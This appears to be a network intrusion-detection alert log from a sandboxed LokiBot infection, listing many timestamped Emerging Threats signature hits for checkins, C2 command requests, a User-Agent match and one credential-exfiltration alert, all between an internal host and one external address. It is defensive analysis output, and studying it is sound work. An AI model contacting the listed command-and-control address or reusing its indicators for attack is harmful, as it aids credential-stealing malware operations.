                                                04/06/24-09:29:39.580792TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974280192.168.2.6172.67.148.126
                                                04/06/24-09:30:27.986411TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980280192.168.2.6172.67.148.126
                                                04/06/24-09:29:26.328739TCP2825766ETPRO TROJAN LokiBot Checkin M24972080192.168.2.6172.67.148.126
                                                04/06/24-09:29:55.812911TCP2825766ETPRO TROJAN LokiBot Checkin M24976180192.168.2.6172.67.148.126
                                                04/06/24-09:31:05.441892TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984880192.168.2.6172.67.148.126
                                                04/06/24-09:31:02.332845TCP2825766ETPRO TROJAN LokiBot Checkin M24984480192.168.2.6172.67.148.126
                                                04/06/24-09:29:51.920859TCP2025381ET TROJAN LokiBot Checkin4975680192.168.2.6172.67.148.126
                                                04/06/24-09:31:01.546959TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984380192.168.2.6172.67.148.126
                                                04/06/24-09:31:23.194950TCP2025381ET TROJAN LokiBot Checkin4987080192.168.2.6172.67.148.126
                                                04/06/24-09:29:55.035047TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976080192.168.2.6172.67.148.126
                                                04/06/24-09:29:25.556361TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971980192.168.2.6172.67.148.126
                                                04/06/24-09:30:24.081982TCP2025381ET TROJAN LokiBot Checkin4979780192.168.2.6172.67.148.126
                                                04/06/24-09:31:06.206380TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984980192.168.2.6172.67.148.126
                                                04/06/24-09:30:52.865138TCP2025381ET TROJAN LokiBot Checkin4983480192.168.2.6172.67.148.126
                                                04/06/24-09:31:01.546959TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984380192.168.2.6172.67.148.126
                                                04/06/24-09:30:41.966393TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982080192.168.2.6172.67.148.126
                                                04/06/24-09:29:46.581121TCP2025381ET TROJAN LokiBot Checkin4975180192.168.2.6172.67.148.126
                                                04/06/24-09:30:20.206304TCP2025381ET TROJAN LokiBot Checkin4979280192.168.2.6172.67.148.126
                                                04/06/24-09:29:42.690473TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974680192.168.2.6172.67.148.126
                                                04/06/24-09:31:02.332845TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984480192.168.2.6172.67.148.126
                                                04/06/24-09:29:45.018070TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974980192.168.2.6172.67.148.126
                                                04/06/24-09:29:53.470085TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975880192.168.2.6172.67.148.126
                                                04/06/24-09:31:06.206380TCP2825766ETPRO TROJAN LokiBot Checkin M24984980192.168.2.6172.67.148.126
                                                04/06/24-09:30:52.096160TCP2025381ET TROJAN LokiBot Checkin4983380192.168.2.6172.67.148.126
                                                04/06/24-09:29:45.018070TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974980192.168.2.6172.67.148.126
                                                04/06/24-09:31:04.659572TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984780192.168.2.6172.67.148.126
                                                04/06/24-09:29:47.378472TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975280192.168.2.6172.67.148.126
                                                04/06/24-09:29:53.470085TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975880192.168.2.6172.67.148.126
                                                04/06/24-09:29:51.123133TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975580192.168.2.6172.67.148.126
                                                04/06/24-09:29:41.115114TCP2025381ET TROJAN LokiBot Checkin4974480192.168.2.6172.67.148.126
                                                04/06/24-09:31:00.769505TCP2025381ET TROJAN LokiBot Checkin4984280192.168.2.6172.67.148.126
                                                04/06/24-09:31:04.659572TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984780192.168.2.6172.67.148.126
                                                04/06/24-09:29:47.378472TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975280192.168.2.6172.67.148.126
                                                04/06/24-09:31:06.999341TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985080192.168.2.6172.67.148.126
                                                04/06/24-09:30:10.531874TCP2825766ETPRO TROJAN LokiBot Checkin M24977880192.168.2.6172.67.148.126
                                                04/06/24-09:29:55.812911TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976180192.168.2.6172.67.148.126
                                                04/06/24-09:30:12.096911TCP2825766ETPRO TROJAN LokiBot Checkin M24978180192.168.2.6172.67.148.126
                                                04/06/24-09:30:02.046578TCP2025381ET TROJAN LokiBot Checkin4976980192.168.2.6172.67.148.126
                                                04/06/24-09:31:10.846749TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985680192.168.2.6172.67.148.126
                                                04/06/24-09:30:11.314149TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978080192.168.2.6172.67.148.126
                                                04/06/24-09:31:10.846749TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985680192.168.2.6172.67.148.126
                                                04/06/24-09:30:31.907019TCP2825766ETPRO TROJAN LokiBot Checkin M24980780192.168.2.6172.67.148.126
                                                04/06/24-09:30:43.503603TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982280192.168.2.6172.67.148.126
                                                04/06/24-09:30:48.181654TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982880192.168.2.6172.67.148.126
                                                04/06/24-09:30:36.516498TCP2025381ET TROJAN LokiBot Checkin4981480192.168.2.6172.67.148.126
                                                04/06/24-09:29:31.298967TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972780192.168.2.6172.67.148.126
                                                04/06/24-09:30:48.181654TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982880192.168.2.6172.67.148.126
                                                04/06/24-09:29:27.109787TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972180192.168.2.6172.67.148.126
                                                04/06/24-09:30:05.891670TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977480192.168.2.6172.67.148.126
                                                04/06/24-09:30:38.088060TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981680192.168.2.6172.67.148.126
                                                04/06/24-09:31:03.119856TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984580192.168.2.6172.67.148.126
                                                04/06/24-09:30:11.314149TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978080192.168.2.6172.67.148.126
                                                04/06/24-09:29:24.839758TCP2825766ETPRO TROJAN LokiBot Checkin M24971880192.168.2.6172.67.148.126
                                                04/06/24-09:29:54.259588TCP2825766ETPRO TROJAN LokiBot Checkin M24975980192.168.2.6172.67.148.126
                                                04/06/24-09:30:15.972978TCP2825766ETPRO TROJAN LokiBot Checkin M24978780192.168.2.6172.67.148.126
                                                04/06/24-09:30:43.503603TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982280192.168.2.6172.67.148.126
                                                04/06/24-09:31:05.441892TCP2825766ETPRO TROJAN LokiBot Checkin M24984880192.168.2.6172.67.148.126
                                                04/06/24-09:30:15.205072TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978680192.168.2.6172.67.148.126
                                                04/06/24-09:30:17.112021TCP2025381ET TROJAN LokiBot Checkin4978880192.168.2.6172.67.148.126
                                                04/06/24-09:30:04.359604TCP2025381ET TROJAN LokiBot Checkin4977280192.168.2.6172.67.148.126
                                                04/06/24-09:31:12.357168TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985880192.168.2.6172.67.148.126
                                                04/06/24-09:31:14.663983TCP2025381ET TROJAN LokiBot Checkin4986180192.168.2.6172.67.148.126
                                                04/06/24-09:30:15.205072TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978680192.168.2.6172.67.148.126
                                                04/06/24-09:31:13.897343TCP2825766ETPRO TROJAN LokiBot Checkin M24986080192.168.2.6172.67.148.126
                                                04/06/24-09:29:48.178974TCP2825766ETPRO TROJAN LokiBot Checkin M24975380192.168.2.6172.67.148.126
                                                04/06/24-09:29:24.137227TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24971780192.168.2.6172.67.148.126
                                                04/06/24-09:30:31.133120TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980680192.168.2.6172.67.148.126
                                                04/06/24-09:30:44.269499TCP2825766ETPRO TROJAN LokiBot Checkin M24982380192.168.2.6172.67.148.126
                                                04/06/24-09:30:28.779878TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980380192.168.2.6172.67.148.126
                                                04/06/24-09:29:24.137227TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14971780192.168.2.6172.67.148.126
                                                04/06/24-09:31:13.117986TCP2025381ET TROJAN LokiBot Checkin4985980192.168.2.6172.67.148.126
                                                04/06/24-09:29:35.705322TCP2825766ETPRO TROJAN LokiBot Checkin M24973480192.168.2.6172.67.148.126
                                                04/06/24-09:30:31.133120TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980680192.168.2.6172.67.148.126
                                                04/06/24-09:29:26.328739TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972080192.168.2.6172.67.148.126
                                                04/06/24-09:29:36.488685TCP2825766ETPRO TROJAN LokiBot Checkin M24973780192.168.2.6172.67.148.126
                                                04/06/24-09:30:28.779878TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980380192.168.2.6172.67.148.126
                                                04/06/24-09:30:08.980641TCP2025381ET TROJAN LokiBot Checkin4977680192.168.2.6172.67.148.126
                                                04/06/24-09:30:15.972978TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978780192.168.2.6172.67.148.126
                                                04/06/24-09:30:26.424765TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980080192.168.2.6172.67.148.126
                                                04/06/24-09:29:26.328739TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972080192.168.2.6172.67.148.126
                                                04/06/24-09:30:25.641172TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979980192.168.2.6172.67.148.126
                                                04/06/24-09:30:14.423119TCP2025381ET TROJAN LokiBot Checkin4978580192.168.2.6172.67.148.126
                                                04/06/24-09:29:38.036927TCP2825766ETPRO TROJAN LokiBot Checkin M24974080192.168.2.6172.67.148.126
                                                04/06/24-09:30:19.440133TCP2025381ET TROJAN LokiBot Checkin4979180192.168.2.6172.67.148.126
                                                04/06/24-09:30:51.314444TCP2825766ETPRO TROJAN LokiBot Checkin M24983280192.168.2.6172.67.148.126
                                                04/06/24-09:30:25.641172TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979980192.168.2.6172.67.148.126
                                                04/06/24-09:31:03.891737TCP2025381ET TROJAN LokiBot Checkin4984680192.168.2.6172.67.148.126
                                                04/06/24-09:31:13.897343TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986080192.168.2.6172.67.148.126
                                                04/06/24-09:30:18.674487TCP2825766ETPRO TROJAN LokiBot Checkin M24979080192.168.2.6172.67.148.126
                                                04/06/24-09:29:27.906071TCP2025381ET TROJAN LokiBot Checkin4972280192.168.2.6172.67.148.126
                                                04/06/24-09:30:09.757970TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977780192.168.2.6172.67.148.126
                                                04/06/24-09:30:29.547586TCP2825766ETPRO TROJAN LokiBot Checkin M24980480192.168.2.6172.67.148.126
                                                04/06/24-09:30:03.603579TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977180192.168.2.6172.67.148.126
                                                04/06/24-09:30:30.339047TCP2025381ET TROJAN LokiBot Checkin4980580192.168.2.6172.67.148.126
                                                04/06/24-09:31:24.825007TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987280192.168.2.6172.67.148.126
                                                04/06/24-09:30:39.686953TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981980192.168.2.6172.67.148.126
                                                04/06/24-09:30:50.516269TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983180192.168.2.6172.67.148.126
                                                04/06/24-09:29:52.706701TCP2025381ET TROJAN LokiBot Checkin4975780192.168.2.6172.67.148.126
                                                04/06/24-09:29:54.259588TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975980192.168.2.6172.67.148.126
                                                04/06/24-09:30:09.757970TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977780192.168.2.6172.67.148.126
                                                04/06/24-09:29:24.839758TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971880192.168.2.6172.67.148.126
                                                04/06/24-09:30:50.516269TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983180192.168.2.6172.67.148.126
                                                04/06/24-09:29:55.812911TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976180192.168.2.6172.67.148.126
                                                04/06/24-09:31:07.768549TCP2825766ETPRO TROJAN LokiBot Checkin M24985180192.168.2.6172.67.148.126
                                                04/06/24-09:29:27.109787TCP2825766ETPRO TROJAN LokiBot Checkin M24972180192.168.2.6172.67.148.126
                                                04/06/24-09:29:57.360186TCP2025381ET TROJAN LokiBot Checkin4976380192.168.2.6172.67.148.126
                                                04/06/24-09:30:39.686953TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981980192.168.2.6172.67.148.126
                                                04/06/24-09:31:06.999341TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985080192.168.2.6172.67.148.126
                                                04/06/24-09:29:56.595283TCP2825766ETPRO TROJAN LokiBot Checkin M24976280192.168.2.6172.67.148.126
                                                04/06/24-09:30:18.674487TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979080192.168.2.6172.67.148.126
                                                04/06/24-09:30:34.204192TCP2825766ETPRO TROJAN LokiBot Checkin M24981080192.168.2.6172.67.148.126
                                                04/06/24-09:30:59.991734TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984180192.168.2.6172.67.148.126
                                                04/06/24-09:31:02.332845TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984480192.168.2.6172.67.148.126
                                                04/06/24-09:29:40.344957TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974380192.168.2.6172.67.148.126
                                                04/06/24-09:30:49.735329TCP2025381ET TROJAN LokiBot Checkin4983080192.168.2.6172.67.148.126
                                                04/06/24-09:31:10.080334TCP2825766ETPRO TROJAN LokiBot Checkin M24985580192.168.2.6172.67.148.126
                                                04/06/24-09:29:55.035047TCP2825766ETPRO TROJAN LokiBot Checkin M24976080192.168.2.6172.67.148.126
                                                04/06/24-09:29:39.580792TCP2825766ETPRO TROJAN LokiBot Checkin M24974280192.168.2.6172.67.148.126
                                                04/06/24-09:30:20.206304TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979280192.168.2.6172.67.148.126
                                                04/06/24-09:29:34.079276TCP2025381ET TROJAN LokiBot Checkin4972980192.168.2.6172.67.148.126
                                                04/06/24-09:31:03.119856TCP2025381ET TROJAN LokiBot Checkin4984580192.168.2.6172.67.148.126
                                                04/06/24-09:30:47.361321TCP2025381ET TROJAN LokiBot Checkin4982780192.168.2.6172.67.148.126
                                                04/06/24-09:31:02.332845TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984480192.168.2.6172.67.148.126
                                                04/06/24-09:29:58.128553TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976480192.168.2.6172.67.148.126
                                                04/06/24-09:29:58.128553TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976480192.168.2.6172.67.148.126
                                                04/06/24-09:29:45.799677TCP2025381ET TROJAN LokiBot Checkin4975080192.168.2.6172.67.148.126
                                                04/06/24-09:29:27.109787TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972180192.168.2.6172.67.148.126
                                                04/06/24-09:30:12.861151TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978280192.168.2.6172.67.148.126
                                                04/06/24-09:31:13.117986TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985980192.168.2.6172.67.148.126
                                                04/06/24-09:29:53.470085TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975880192.168.2.6172.67.148.126
                                                04/06/24-09:30:08.980641TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977680192.168.2.6172.67.148.126
                                                04/06/24-09:30:35.733011TCP2025381ET TROJAN LokiBot Checkin4981280192.168.2.6172.67.148.126
                                                04/06/24-09:31:13.117986TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985980192.168.2.6172.67.148.126
                                                04/06/24-09:29:27.109787TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972180192.168.2.6172.67.148.126
                                                04/06/24-09:30:55.220105TCP2825766ETPRO TROJAN LokiBot Checkin M24983780192.168.2.6172.67.148.126
                                                04/06/24-09:31:19.370644TCP2825766ETPRO TROJAN LokiBot Checkin M24986580192.168.2.6172.67.148.126
                                                04/06/24-09:30:02.814837TCP2825766ETPRO TROJAN LokiBot Checkin M24977080192.168.2.6172.67.148.126
                                                04/06/24-09:31:22.429106TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986980192.168.2.6172.67.148.126
                                                04/06/24-09:30:01.279270TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976880192.168.2.6172.67.148.126
                                                04/06/24-09:30:12.861151TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978280192.168.2.6172.67.148.126
                                                04/06/24-09:30:39.686953TCP2825766ETPRO TROJAN LokiBot Checkin M24981980192.168.2.6172.67.148.126
                                                04/06/24-09:31:22.429106TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986980192.168.2.6172.67.148.126
                                                04/06/24-09:30:38.088060TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981680192.168.2.6172.67.148.126
                                                04/06/24-09:31:10.080334TCP2025381ET TROJAN LokiBot Checkin4985580192.168.2.6172.67.148.126
                                                04/06/24-09:29:47.378472TCP2825766ETPRO TROJAN LokiBot Checkin M24975280192.168.2.6172.67.148.126
                                                04/06/24-09:29:29.470677TCP2825766ETPRO TROJAN LokiBot Checkin M24972480192.168.2.6172.67.148.126
                                                04/06/24-09:30:20.970310TCP2825766ETPRO TROJAN LokiBot Checkin M24979380192.168.2.6172.67.148.126
                                                04/06/24-09:30:38.088060TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981680192.168.2.6172.67.148.126
                                                04/06/24-09:30:15.205072TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978680192.168.2.6172.67.148.126
                                                04/06/24-09:29:58.921065TCP2825766ETPRO TROJAN LokiBot Checkin M24976580192.168.2.6172.67.148.126
                                                04/06/24-09:30:20.206304TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979280192.168.2.6172.67.148.126
                                                04/06/24-09:31:04.659572TCP2825766ETPRO TROJAN LokiBot Checkin M24984780192.168.2.6172.67.148.126
                                                04/06/24-09:30:27.986411TCP2025381ET TROJAN LokiBot Checkin4980280192.168.2.6172.67.148.126
                                                04/06/24-09:29:24.137227TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971780192.168.2.6172.67.148.126
                                                04/06/24-09:30:00.493399TCP2025381ET TROJAN LokiBot Checkin4976780192.168.2.6172.67.148.126
                                                04/06/24-09:30:38.861510TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981880192.168.2.6172.67.148.126
                                                04/06/24-09:29:27.906071TCP2825766ETPRO TROJAN LokiBot Checkin M24972280192.168.2.6172.67.148.126
                                                04/06/24-09:30:11.314149TCP2825766ETPRO TROJAN LokiBot Checkin M24978080192.168.2.6172.67.148.126
                                                04/06/24-09:30:12.096911TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978180192.168.2.6172.67.148.126
                                                04/06/24-09:31:20.907030TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986780192.168.2.6172.67.148.126
                                                04/06/24-09:31:20.907030TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986780192.168.2.6172.67.148.126
                                                04/06/24-09:30:48.957388TCP2825766ETPRO TROJAN LokiBot Checkin M24982980192.168.2.6172.67.148.126
                                                04/06/24-09:30:29.547586TCP2025381ET TROJAN LokiBot Checkin4980480192.168.2.6172.67.148.126
                                                04/06/24-09:29:46.581121TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975180192.168.2.6172.67.148.126
                                                04/06/24-09:30:28.779878TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980380192.168.2.6172.67.148.126
                                                04/06/24-09:30:56.772335TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983980192.168.2.6172.67.148.126
                                                04/06/24-09:31:11.610579TCP2825766ETPRO TROJAN LokiBot Checkin M24985780192.168.2.6172.67.148.126
                                                04/06/24-09:29:38.799315TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974180192.168.2.6172.67.148.126
                                                04/06/24-09:30:25.641172TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979980192.168.2.6172.67.148.126
                                                04/06/24-09:30:23.301208TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979680192.168.2.6172.67.148.126
                                                04/06/24-09:29:38.799315TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974180192.168.2.6172.67.148.126
                                                04/06/24-09:30:56.772335TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983980192.168.2.6172.67.148.126
                                                04/06/24-09:30:38.861510TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981880192.168.2.6172.67.148.126
                                                04/06/24-09:30:36.516498TCP2825766ETPRO TROJAN LokiBot Checkin M24981480192.168.2.6172.67.148.126
                                                04/06/24-09:31:09.316933TCP2025381ET TROJAN LokiBot Checkin4985380192.168.2.6172.67.148.126
                                                04/06/24-09:30:19.440133TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979180192.168.2.6172.67.148.126
                                                04/06/24-09:30:21.735500TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979480192.168.2.6172.67.148.126
                                                04/06/24-09:30:57.593507TCP2025381ET TROJAN LokiBot Checkin4984080192.168.2.6172.67.148.126
                                                04/06/24-09:31:21.669304TCP2825766ETPRO TROJAN LokiBot Checkin M24986880192.168.2.6172.67.148.126
                                                04/06/24-09:29:48.178974TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975380192.168.2.6172.67.148.126
                                                04/06/24-09:29:31.298967TCP2825766ETPRO TROJAN LokiBot Checkin M24972780192.168.2.6172.67.148.126
                                                04/06/24-09:29:51.123133TCP2825766ETPRO TROJAN LokiBot Checkin M24975580192.168.2.6172.67.148.126
                                                04/06/24-09:31:12.357168TCP2025381ET TROJAN LokiBot Checkin4985880192.168.2.6172.67.148.126
                                                04/06/24-09:30:50.516269TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983180192.168.2.6172.67.148.126
                                                04/06/24-09:31:24.825007TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987280192.168.2.6172.67.148.126
                                                04/06/24-09:30:19.440133TCP2825766ETPRO TROJAN LokiBot Checkin M24979180192.168.2.6172.67.148.126
                                                04/06/24-09:29:30.251229TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972580192.168.2.6172.67.148.126
                                                04/06/24-09:29:38.036927TCP2025381ET TROJAN LokiBot Checkin4974080192.168.2.6172.67.148.126
                                                04/06/24-09:30:18.674487TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979080192.168.2.6172.67.148.126
                                                04/06/24-09:30:46.592042TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982680192.168.2.6172.67.148.126
                                                04/06/24-09:29:37.260471TCP2025381ET TROJAN LokiBot Checkin4973980192.168.2.6172.67.148.126
                                                04/06/24-09:30:46.592042TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982680192.168.2.6172.67.148.126
                                                04/06/24-09:30:18.674487TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979080192.168.2.6172.67.148.126
                                                04/06/24-09:29:59.690030TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976680192.168.2.6172.67.148.126
                                                04/06/24-09:29:45.799677TCP2825766ETPRO TROJAN LokiBot Checkin M24975080192.168.2.6172.67.148.126
                                                04/06/24-09:30:47.361321TCP2825766ETPRO TROJAN LokiBot Checkin M24982780192.168.2.6172.67.148.126
                                                04/06/24-09:30:22.504191TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979580192.168.2.6172.67.148.126
                                                04/06/24-09:31:08.547895TCP2825766ETPRO TROJAN LokiBot Checkin M24985280192.168.2.6172.67.148.126
                                                04/06/24-09:30:22.504191TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979580192.168.2.6172.67.148.126
                                                04/06/24-09:31:21.669304TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986880192.168.2.6172.67.148.126
                                                04/06/24-09:30:52.865138TCP2825766ETPRO TROJAN LokiBot Checkin M24983480192.168.2.6172.67.148.126
                                                04/06/24-09:30:05.124910TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977380192.168.2.6172.67.148.126
                                                04/06/24-09:31:15.463121TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986280192.168.2.6172.67.148.126
                                                04/06/24-09:29:26.328739TCP2025381ET TROJAN LokiBot Checkin4972080192.168.2.6172.67.148.126
                                                04/06/24-09:30:14.423119TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978580192.168.2.6172.67.148.126
                                                04/06/24-09:29:41.891260TCP2825766ETPRO TROJAN LokiBot Checkin M24974580192.168.2.6172.67.148.126
                                                04/06/24-09:30:15.972978TCP2025381ET TROJAN LokiBot Checkin4978780192.168.2.6172.67.148.126
                                                04/06/24-09:29:56.595283TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976280192.168.2.6172.67.148.126
                                                04/06/24-09:30:14.423119TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978580192.168.2.6172.67.148.126
                                                04/06/24-09:29:57.360186TCP2825766ETPRO TROJAN LokiBot Checkin M24976380192.168.2.6172.67.148.126
                                                04/06/24-09:29:56.595283TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976280192.168.2.6172.67.148.126
                                                04/06/24-09:30:52.865138TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983480192.168.2.6172.67.148.126
                                                04/06/24-09:31:13.897343TCP2025381ET TROJAN LokiBot Checkin4986080192.168.2.6172.67.148.126
                                                04/06/24-09:30:03.603579TCP2025381ET TROJAN LokiBot Checkin4977180192.168.2.6172.67.148.126
                                                04/06/24-09:30:51.314444TCP2025381ET TROJAN LokiBot Checkin4983280192.168.2.6172.67.148.126
                                                04/06/24-09:29:27.906071TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972280192.168.2.6172.67.148.126
                                                04/06/24-09:29:24.137227TCP2825766ETPRO TROJAN LokiBot Checkin M24971780192.168.2.6172.67.148.126
                                                04/06/24-09:30:44.269499TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982380192.168.2.6172.67.148.126
                                                04/06/24-09:30:45.801533TCP2025381ET TROJAN LokiBot Checkin4982580192.168.2.6172.67.148.126
                                                04/06/24-09:29:52.706701TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975780192.168.2.6172.67.148.126
                                                04/06/24-09:31:08.547895TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985280192.168.2.6172.67.148.126
                                                04/06/24-09:29:54.259588TCP2025381ET TROJAN LokiBot Checkin4975980192.168.2.6172.67.148.126
                                                04/06/24-09:31:03.891737TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984680192.168.2.6172.67.148.126
                                                04/06/24-09:31:05.441892TCP2025381ET TROJAN LokiBot Checkin4984880192.168.2.6172.67.148.126
                                                04/06/24-09:30:31.133120TCP2825766ETPRO TROJAN LokiBot Checkin M24980680192.168.2.6172.67.148.126
                                                04/06/24-09:29:35.705322TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973480192.168.2.6172.67.148.126
                                                04/06/24-09:29:24.839758TCP2025381ET TROJAN LokiBot Checkin4971880192.168.2.6172.67.148.126
                                                04/06/24-09:30:30.339047TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980580192.168.2.6172.67.148.126
                                                04/06/24-09:30:45.042075TCP2825766ETPRO TROJAN LokiBot Checkin M24982480192.168.2.6172.67.148.126
                                                04/06/24-09:31:20.136720TCP2025381ET TROJAN LokiBot Checkin4986680192.168.2.6172.67.148.126
                                                04/06/24-09:29:41.891260TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974580192.168.2.6172.67.148.126
                                                04/06/24-09:31:18.590588TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986480192.168.2.6172.67.148.126
                                                04/06/24-09:29:35.705322TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973480192.168.2.6172.67.148.126
                                                04/06/24-09:30:34.975531TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981180192.168.2.6172.67.148.126
                                                04/06/24-09:31:18.590588TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986480192.168.2.6172.67.148.126
                                                04/06/24-09:29:52.706701TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975780192.168.2.6172.67.148.126
